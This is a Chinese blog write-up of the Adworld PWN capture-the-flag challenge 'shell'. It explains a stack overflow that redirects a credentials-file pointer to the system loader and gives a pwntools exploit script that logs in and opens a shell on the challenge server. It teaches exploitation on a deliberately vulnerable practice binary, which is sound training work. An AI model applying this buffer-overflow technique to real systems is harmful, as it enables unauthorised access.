攻防世界PWN之shell题解

最新推荐文章于 2022-10-26 17:36:48 发布
最新推荐文章于 2022-10-26 17:36:48 发布
阅读量1.4k 收藏
点赞数 1
分类专栏: 二进制漏洞 pwn CTF 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/103199036
版权
二进制漏洞 同时被 3 个专栏收录
161 篇文章 9 订阅
订阅专栏
pwn
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

shell

首先,检查一下程序的保护机制

然后,我们用IDA分析

存在栈溢出漏洞

我们先运行程序,发现可以直接输命令

然而,其他命令都不可用,需要登录成功才能用

我们看看登录的逻辑

程序从creds.txt文件中一行一行的读取,取第一个冒号后面的内容为用户名,取第二个冒号后面的内容为密码

只要我们输入的用户名和密码存在于那个文件,就登录成功,然后就能执行shell

Main函数里最外层是死循环,因此我们不能结束它,也就不能ROP

我们可以把filename指针覆盖成其他地方啊,查看一下文件中的字符串

这个可以用,我们就把filename指针指向这个字符串吧,这样,程序第二次循环就从/lib64/ld-linux-x86-64.so.2文件中读取,由于我们本地也用这个文件,我们可以找找里面的字符串有没有符合条件的

  1. #include <stdio.h>  
  2.   
  3. int main() {  
  4.     FILE *f = fopen("/lib64/ld-linux-x86-64.so.2","r");  
  5.     char *buf = NULL;  
  6.     size_t n;  
  7.     if (f == NULL) {  
  8.         printf("error\n");  
  9.     }  
  10.     while (getline(&buf,&n,f) != -1) {  
  11.         char* user = strtok(buf, ":");  
  12.         char* pwd = strtok(0LL, ":");  
  13.         printf("%s:%s\n",user,pwd);  
  14.     }  
  15.     fclose(f);  
  16.     return 0;  
  17. }  

我们发现,这些都可以使用

那么我们就随便选一组即可

综上,我们的exp脚本

  1. #coding:utf8  
  2. from pwn import *  
  3.   
  4. sh = remote('111.198.29.45',58711)  
  5.   
  6. #sh = process('./shell')  
  7. sh.sendline('login')  
  8. sh.sendlineafter('Username: ','sea')  
  9. #溢出栈覆盖filename,使得程序读取/lib64/ld-linux-x86-64.so.2文件中的内容  
  10. payload = 'a'*0x44 + p64(0x400200)  
  11. sh.sendlineafter('Password: ',payload)  
  12.   
  13. sh.sendlineafter('Authentication failed!','login')  
  14. sh.sendlineafter('Username: ','relocation processing')  
  15. sh.sendlineafter('Password: ',' %s%s')  
  16.   
  17. sh.sendlineafter('Authenticated!','sh')  
  18.   
  19.   
  20. sh.interactive()  
ha1vk
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-PWN练习之执行Shellcode
ChuMeng1999的博客
01-05 1476
目录预备知识一、相关实验二、Shellcode三、执行Shellcode实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之返回地址覆盖》。 二、Shellcode Shellcode缓冲区溢出攻击中植入进程的恶意代码,这段代码可以弹出一个消息框,也可以在目标机器上打开一个监听端口,甚至是删除目标机器上的重要文件等。 Shellcode通常需要使用汇编语言进
攻防世界-PWN-shell
aptx4869_li的博客
05-29 339
攻防世界-PWN-shell 检查保护机制 healer@healer-virtual-machine:~/Desktop/shell$ checksec shell [*] '/home/healer/Desktop/shell/shell' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x4000
攻防世界(pwn) shell——c代码审计题
PLpa的博客
04-19 962
前言: 此题难度没有前几题或者后几题难度大,考验的是对c程序逻辑的理解。 开了canary和NX保护,我们打首先运行一下程序查看程序的逻辑。 程序打开了一个shell,但是只能运行ls指令,不能运行cat指令,这样我们就不能查看远端的信息了。 我们打开IDA看看程序的逻辑。 通过IDA的提示,我们知道,程序还可以运行login指令,他是一个登录程序,登录成功后就可以获取权限。 我们继续往下看...
攻防世界 进阶 shell
yongbaoii的博客
02-21 168
保护 分析一下程序。 只能先login命令登陆。 login之后就输入用户名,密码。 用户名,密码输入的时候明显能看得到溢出。 要介绍个新函数。 C 库函数 char *strtok(char *str, const char *delim) 分解字符串 str 为一组字符串,delim 为分隔符。 程序从creds.txt文件中一行一行的读取,取第一个冒号后面的内容为用户名,取第二个冒号后面的内容为密码。 那么整个的流程就看得出来是读入用户名密码,然后跟文件中的进行比较,比较成功就登陆成功。 那么我
攻防世界-pwn-新手-get_shell
weixin_31610083的博客
10-12 863
【题目描述】 运行就能拿到shell呢,真的 【附件】 一个文件 【过程及思路】 文件没有后缀。 直接丢到虚拟机(linux)里,改名为get_shell。 发现文件还没有执行权限,那就自己加上: Chmod +x get_shell 其中filename是附件的名字。 执行了出来是这个样子。 就这?? 确实拿到shell了,只不过是自己的shell…这个题目提示越来越皮了。 看了一下别人的WP,直接连给出的地址和端口就行。 Pwn代码: from pwn...
攻防世界PWN-get_shell
Deeeelete的博客
11-06 1068
工具类:IDA64位,exeinfope,pwntools库(python2支持) 题目: 1.下载附件,拖进Exeinfo PE查看为64位进程 2.拖进64位IDA,找左侧的main函数 查看源码 int __cdecl main(int argc, const char **argv, const char **envp) { puts("OK,this time we will get a shell."); system("/bin/sh"); return 0;.
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
攻防世界BABYRE_简单shellcode的逆向_017
weixin_43281394的博客
03-19 325
攻防世界BABYRE_简单shellcode的逆向,
pwn shellcode
doudoudedi
11-03 716
漏洞函数很简单没开任何保护直接写入shellcoe读flag这里只允许open read write exp: from pwn import * import pwnlib context_arch='amd64' #p=process('./bad') p=remote('pwnto.fun',12301) elf=ELF('./bad') buf_addr=0x123000 jmp_rsp...
pwn刷题num18------直接连接远程即能获得shell
tbsqigongzi的博客
04-24 580
BUUCTFPWN–test_your_nc 首先查保护->看链接类型->增加可执行权限->运行 64位,小端序 开启部分RELRO---got表仍可写 未开启canary保护---栈溢出 开启NX保护----堆栈不可执行 开启PIE----程序地址不是真实地址 动态链接 程序执行后出现一个$符号,随便输入后又出现了/bin/sh ida看一下 主函数直接就是调用了system(“/bin/sh”),直接获得shell 或者写个exp exp from pwn import
PWN简单栈溢出漏洞获取shell
SkYe's Blog
08-13 2763
PWN简单栈溢出漏洞获取shell 题目来源 下载链接(密码akcz) CTF的时候需要的是获取系统shell,然后通过shell去拿到flag。 条件所限,那我们就先将程序放本地。也就是本地机也充当远程服务器角色 1. 运行程序、查看文件类型、保护措施 程序输出一段应该是内存地址的16位字符串;接着要求我们输入,之后就结束运行程序。 程序为32位动态链接的ELF文件 可以看到NX保护关...
linux栈溢出漏洞,PWN简单栈溢出漏洞获取shell | kTWO-个人博客
weixin_39611389的博客
05-16 891
摘要本文讲述的是PWN中利用溢出漏洞来执行shell命令的方法教程,本文将以简单的小程序来作为演示,从分析程序到编写payload加以利用,其中还含有二进制程序的保护机制简介。0x01 前言经过前面的几篇文章我们大概以及了解了基本的栈溢出漏洞的利用方式,那今天就来个进阶版。有时候我们在打CTF的时候需要的是获取系统shell,然后通过shell去拿到flag,那么我们该怎么通过溢出漏洞来拿到服务器...
攻防世界-pwn新手区-get_shell
CHAWUCIREN1的博客
07-26 432
我们尝试运行一下, 好家伙,直接就getshell nc连一下 ls一下 直接cat flag吧 这样是不是有点简单 丢进ida分析一下 F5反编译一下 发现是在程序里面就直接调用system函数,直接getshell,签到题。
Pwn学习 (3)
红叶的博客
10-26 644
但是system内的不是熟悉的/bin/sh,而是shell!成功获取shell,不过随时都会关闭,这题的flag存在/home/babyrop的flag中。先覆写到ebp的位置,然后gets 输入system的地址,最后在输入/bin/sh。可以将/bin/sh写入.bss段中,因为未开启PIE,并且bss可执行。研究研究 ret2libc3 再看看后续的题,发现后续的题目都是需要这个的。依旧没有/bin/sh,但是这一次Shift+F12里也没有。此外还需要一个pop_rdi,大佬们的说法是。
攻防世界PWN之wuda题解
seaaseesa的博客
02-12 579
Wuda 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下 是一个类似于服务器的程序,监听了本地端口1337 看起来很复杂,当我们的关注点不在这 我们的关注点在这,当数据包满足一定的条件后,就能调出菜单。 菜单里是经典的增删改查操作 堆的大小没有限制,最多可以保存10个堆指针。 经过分析,我们发现节点的结构体是这样的 typedefstru...
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值